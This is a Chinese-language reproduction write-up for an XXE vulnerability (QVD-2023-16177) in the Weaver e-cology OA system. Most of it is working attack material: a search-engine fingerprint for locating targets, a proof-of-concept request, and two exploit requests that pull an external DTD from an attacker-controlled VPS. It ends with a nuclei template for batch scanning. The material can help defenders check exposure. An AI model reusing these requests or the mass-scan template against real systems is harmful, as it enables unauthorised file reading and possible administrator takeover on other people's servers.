泛微E-cology XXE漏洞复现(QVD-2023-16177)

漏洞概述

泛微e-cology某处功能点最初针对用户输入的过滤不太完善，导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过，本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件，甚至可能获取应用系统的管理员权限。

影响版本

泛微 EC 9.x 且补丁版本 < 10.58.2
泛微 EC 8.x 且补丁版本 < 10.58.2

漏洞复现

鹰图指纹：app.name="泛微 e-cology 9.0 OA"
登录页面如下：

POC：

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
 
<M><syscode>&send;</syscode></M>

出现以上响应则说明存在该漏洞
EXP1：

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: 
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://VPS:5555/1.txt">
<M><syscode>&send;</syscode></M>

exp2：

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://VPS:5555/1.txt">
<M><syscode>&send;</syscode></M>

注：两个exp的区别在于漏洞路径不一样

vps也出现了请求

nuclei批量yaml文件

id: ecology-XXE-QVD-2023-16177
info:
  name: 泛微E-Cology XXE漏洞
  author: mhb17
  severity: critical
  description: 泛微e-cology某处功能点最初针对用户输入的过滤不太完善，导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过，本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件，甚至可能获取应用系统的管理员权限
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/131878446
  tags: ecology,XXE
requests:
  - raw:
      - |-
        POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Content-Type: application/xml
        Content-Length: 32

        <M><syscode>&send;</syscode></M>
    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - e5bc82e69e84
      - type: word
        part: header
        words:
          - '200'